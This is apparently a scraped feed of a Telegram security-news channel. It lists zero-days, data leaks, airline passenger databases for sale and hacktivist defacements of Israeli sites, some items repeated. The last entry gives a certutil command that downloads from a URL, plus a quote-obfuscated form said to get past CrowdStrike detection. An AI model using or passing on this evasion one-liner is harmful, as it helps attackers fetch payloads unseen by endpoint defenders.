Forwarded from cKure Red
Zero-Day: Paracosme (CVE-2022-33318) is the zero-click remote code execution memory corruption exploit to compromise ICONICS Genesis64 on stage at Pwn2Own2022 Miami.
https://www.zerodayinitiative.com/advisories/ZDI-22-1041/
https://www.zerodayinitiative.com/advisories/ZDI-22-1041/
Zerodayinitiative
ZDI-22-1041
(Pwn2Own) ICONICS GENESIS64 genbroker64 Use-After-Free Remote Code Execution Vulnerability
Forwarded from cKure Red
Zero-Day used to access 5.4M user data from Twitter (confirmed by company).
https://hackerone.com/reports/1439026
https://securityaffairs.co/wordpress/134087/data-breach/twitter-zero-day-data-leak.html
https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/
https://hackerone.com/reports/1439026
https://securityaffairs.co/wordpress/134087/data-breach/twitter-zero-day-data-leak.html
https://restoreprivacy.com/twitter-vulnerability-exposes-5-million-accounts/
HackerOne
X (Formerly Twitter) disclosed on HackerOne: Discoverability by...
**Summary:** By using this vulnerability an attacker can find a twitter account by it's phone number/email even if the user has prohibited this in the privacy options.
**Description:** The...
**Description:** The...
■■■■□ A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://github.com/janoglezcampos/DeathSleep
https://github.com/janoglezcampos/DeathSleep
GitHub
GitHub - janoglezcampos/DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it…
A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution. - janoglezcam...
■■■□□ A U-Boot hacking toolkit for security researchers and tinkerers.
https://github.com/nccgroup/depthcharge
https://github.com/nccgroup/depthcharge
GitHub
GitHub - nccgroup/depthcharge: A U-Boot hacking toolkit for security researchers and tinkerers
A U-Boot hacking toolkit for security researchers and tinkerers - GitHub - nccgroup/depthcharge: A U-Boot hacking toolkit for security researchers and tinkerers
■■■□□ Data-Leak amid massive cyber-attack on Israel 🇮🇱 as pro Palestine 🇵🇸 hacktivist groups tear down israeli business and government sites.
This comes in response to killings of innocent in civillian areas by Israeli state in gaza.
Defaced site example:
https://shibuvim.co.il/
This comes in response to killings of innocent in civillian areas by Israeli state in gaza.
Defaced site example:
https://shibuvim.co.il/
■■■□□ XSS in Gmail’s AMP For Email earns researcher $5,000.
https://portswigger.net/daily-swig/xss-in-gmails-amp-for-email-earns-researcher-5-000
https://portswigger.net/daily-swig/xss-in-gmails-amp-for-email-earns-researcher-5-000
The Daily Swig | Cybersecurity news and views
XSS in Gmail’s AMP For Email earns researcher $5,000
Researcher bypasses email filter with inspired style tag trickery
cKure
■■■□□ Data-Leak amid massive cyber-attack on Israel 🇮🇱 as pro Palestine 🇵🇸 hacktivist groups tear down israeli business and government sites. This comes in response to killings of innocent in civillian areas by Israeli state in gaza. Defaced site example:…
■□□□□ A few more sites defaced by Islamic Cyber army
http://eisenbro.w29.wh-2.com/ ❌
http://eisenbros.co.il ❌
#Islamic_Hacker_Army
http://eisenbro.w29.wh-2.com/ ❌
http://eisenbros.co.il ❌
#Islamic_Hacker_Army
Forwarded from Islamic Hacker Army - جيش الهكر الإسلامي
Forwarded from Islamic Hacker Army - جيش الهكر الإسلامي
■■■□□ Microsoft patches Windows DogWalk zero-day exploited in attacks.
https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-windows-dogwalk-zero-day-exploited-in-attacks/
https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-windows-dogwalk-zero-day-exploited-in-attacks/
BleepingComputer
Microsoft patches Windows DogWalk zero-day exploited in attacks
Microsoft has released security updates to address a high severity Windows zero-day vulnerability with publicly available exploit code and abused in attacks.
■■■□□ Data-Leak from Malaysia as actor 'Bill_Joy' claims to have data of Malaysian Airlines.
cKure
■■■□□ Data-Leak from Malaysia as actor 'Bill_Joy' claims to have data of Malaysian Airlines.
■■■■□ Data-Leak from Malaysia 🇲🇾 and UAE 🇦🇪 as compromised databases of the Malaysian and UAE airline passengers are offered for $1,000 each online.
cKure
■■■■□ Data-Leak from Malaysia 🇲🇾 and UAE 🇦🇪 as compromised databases of the Malaysian and UAE airline passengers are offered for $1,000 each online.
■■■□□ For the airline passengers in Malaysia, the amount of stolen data included in the file has about 12 million rows. On the other hand, the compromised data of UAE-based airline passengers have about four million rows.
https://izoologic.com/2022/08/09/data-of-malaysian-and-uae-airline-passengers-for-sale-online/
https://izoologic.com/2022/08/09/data-of-malaysian-and-uae-airline-passengers-for-sale-online/
iZOOlogic
Data of Malaysian and UAE airline passengers for sale online
Dark web actors have stolen massive databases of airline passengers from Malaysia and UAE and advertised them for $1,000 each.
■■■■■ CrowdStrike can be bypassed for executing commands using some techniques. One of them is:
Blocked --> certutil -urlcache -split -f http://<url>
Bypassed --> certutil -url""cache -sp""lit -""f http://<url>
https://twitter.com/_M_Shahnawaz/status/1557240421595619329
Blocked --> certutil -urlcache -split -f http://<url>
Bypassed --> certutil -url""cache -sp""lit -""f http://<url>
https://twitter.com/_M_Shahnawaz/status/1557240421595619329